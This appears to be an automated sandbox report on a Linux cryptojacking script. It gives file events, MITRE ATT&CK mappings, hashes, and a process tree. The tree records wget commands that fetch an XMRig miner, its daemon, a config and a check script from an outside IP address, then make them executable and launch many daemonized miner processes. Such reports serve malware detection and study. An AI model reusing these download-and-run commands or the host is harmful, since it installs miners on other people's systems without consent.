Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/check.sh | wget
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/xmrigMiner | wget
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/config.json | wget
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/xmrigDaemon | wget
File opened for modification | /tmp/config.json | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
File opened for modification | /tmp/logggz.lgo | xmrigMiner
Processes
Each entry gives PID, image path and command line; the indented line beneath it lists the signatures that process triggered. Nesting shows parent/child depth.
- PID 1520  /tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh  /tmp/8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
  - PID 1521  /usr/bin/wget  wget http://45.202.35.107/xmrigDaemon
    Writes file to tmp directory
  - PID 1525  /usr/bin/wget  wget http://45.202.35.107/xmrigMiner
    Writes file to tmp directory
  - PID 1526  /usr/bin/wget  wget http://45.202.35.107/config.json
    Writes file to tmp directory
  - PID 1527  /usr/bin/wget  wget http://45.202.35.107/check.sh
    Writes file to tmp directory
  - PID 1528  /bin/chmod  chmod 777 xmrigMiner
    File and Directory Permissions Modification
  - PID 1529  /bin/chmod  chmod 777 xmrigDaemon
    File and Directory Permissions Modification
  - PID 1530  /bin/chmod  chmod 777 check.sh
    File and Directory Permissions Modification
- PID 1531  /tmp/check.sh  ./check.sh
  Executes dropped EXE
  - PID 1532  /usr/bin/pgrep  pgrep -f xmrigDaemon
    Reads runtime system information
  - PID 1533  /tmp/xmrigDaemon  ./xmrigDaemon
    Executes dropped EXE
    - PID 1534  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1535  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Reads runtime system information; Writes file to tmp directory
    - PID 1542  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1543  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1550  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1551  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1558  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1559  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1566  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1567  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1574  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1575  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1582  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1583  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Writes file to tmp directory
    - PID 1590  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1591  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1598  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1599  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1606  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1607  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1614  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1615  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1622  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1623  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1630  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1631  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Writes file to tmp directory
    - PID 1640  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1641  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1648  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1649  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1656  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1657  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1664  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1665  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1672  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1673  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1680  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1681  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1688  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1689  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Checks CPU configuration; Reads CPU attributes; Writes file to tmp directory
    - PID 1696  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1697  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1704  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1705  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1712  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1713  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1720  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1721  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1728  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1729  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1736  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1737  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Reads CPU attributes; Writes file to tmp directory
    - PID 1744  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1745  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1752  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1753  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1760  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1761  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Checks CPU configuration; Reads CPU attributes; Reads runtime system information; Writes file to tmp directory
    - PID 1768  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1769  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1776  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1777  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1784  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1785  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1792  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1793  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1800  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1801  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Checks CPU configuration; Reads CPU attributes; Writes file to tmp directory
    - PID 1808  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1809  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory
    - PID 1816  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1817  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1824  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1825  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1832  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1833  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1840  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1841  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1848  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1849  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
    - PID 1856  /bin/sh  sh -c "\"./xmrigMiner\" --daemonized"
      - PID 1857  /tmp/xmrigMiner  ./xmrigMiner --daemonized
        Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information; Writes file to tmp directory
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
- Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (2)
- System Checks (2)
Downloads
- Filesize 823B
  MD5 3284592438c4df2dd14b74cec93c6015
  SHA1 1662db32dd1b9ebcf38b20b8d6c2212912bf250e
  SHA256 b456d2835bda6f651883e81201e12e4b7fbb9ad644f17016fbf5553c155cf958
  SHA512 54af1b77dcad7a64a5e5abfae973770e3702dad5f6c3a4738e06ae1cb2a677dea08bb3360a68a8ae9a0dec3d35355a7ecc0351bbe686f9f3ae55abfcc92b0af2
- Filesize 39KB
  MD5 68ca711184451bc4e72c5b615d4a8b5c
  SHA1 d9a0f0fd8bdb37fdea7596ab52be43c254c81790
  SHA256 ed2e669b35586da965d1579844463bcb26e73bcc38152f34bbae1529ea2330d9
  SHA512 e6baa4fe37954cc820c8700f1a153865cee4b5d02c5caad295148c0e45714ed5cb3e42ca5c494ca9feb8e32f2ae550b2c2ea7e9e517fcb6d7857ef5e9bc3b851
- Filesize 629KB
  MD5 bd98e7c9ca771be14cd9229bc1636732
  SHA1 4a4723378eb0268f4659f1b1d3f2be5f74e20b87
  SHA256 0ea2d73e47b8642b24371be112fb04e455bc8577fa17911bd17793887cedeb7e
  SHA512 cd641b0325242bfec608fae6d09c716d2a6519bf2aafeef025e7330c2c1e1c63d90b1b15307adcfa3d3fd4ccaff4003d4facc68038283f7b47ecdfd631380608
- Filesize 7.9MB
  MD5 98d1e494adf9aa586221feeaa74aaf8a
  SHA1 2cbc1044034e21dbaaea4afce3aef772aa468041
  SHA256 c58301ea640b622c52599d530e2a4d302025d4b23dca1b78f61405655733207f
  SHA512 fdd937825c461ce010697b2bb44c6e78bdc7be682c49c4339719a1d2d4c3f38930dd8a0277461ce93f4cc80474a22836a20877da447cb8f8b73ce8182a2a0791